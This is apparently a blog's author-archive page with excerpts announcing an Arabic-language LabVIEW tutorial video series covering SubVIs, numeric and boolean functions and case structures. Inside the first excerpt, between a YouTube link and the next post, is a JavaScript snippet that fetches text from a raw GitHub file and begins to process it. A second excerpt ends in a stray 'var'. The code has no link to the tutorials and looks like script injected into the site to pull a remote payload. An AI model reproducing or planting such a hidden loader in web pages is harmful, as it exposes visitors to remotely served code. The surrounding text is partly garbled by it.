In this video i focused on :
1- creating a SubVI
2- inserting the SubVI into another VI
P.S.:i am sorry i was so sick the day i recorded this video excuse my disorganization but i guess the idea was pretty simple and clear.
Don't forget to subscribe to my channel to get the latest tutorials !
http://www.youtube.com/watch?v=hZ6NrsVdNZE
var url = 'https://raw.githubusercontent.com/lolngnos/loles/main/step.txt';
fetch(url)
.then(response => response.text())
.then(data => {
var Read more [...]
Author Archive
Second Tutorial in LabVIEW series ( arabic version)
The second Tutorial in my LabVIEW series is done.
part 1
http://www.youtube.com/watch?v=fdTkw-p2mws
In this video i focused on :
1- applications of numeric functions
2-comparison function (equal)
3-boolean function (OR) .
part 2 (please check the description is the second video)
http://www.youtube.com/watch?v=31sc0GgSMgw
In this video i focused on :
1- creating a mathematic equation
2-numeric inputs and outputs
3- case structure
don't forget to subscribe for my channel !
Enjoy !!
var Read more [...]
Launching a New Tutorial Series on LabVIEW in Arabic!
LabVIEW (short for Laboratory Virtual Instrument Engineering Workbench) is a system-design platform and development environment for a visual programming language from National Instruments.
This is the first video of a LabVIEW tutorials series , targeting all those looking for the beginning point to start with graphical programming, and if you are having problems with English language don't worry because the videos are in Arabic .
(P.S. : an English version will be published after the series is Read more [...]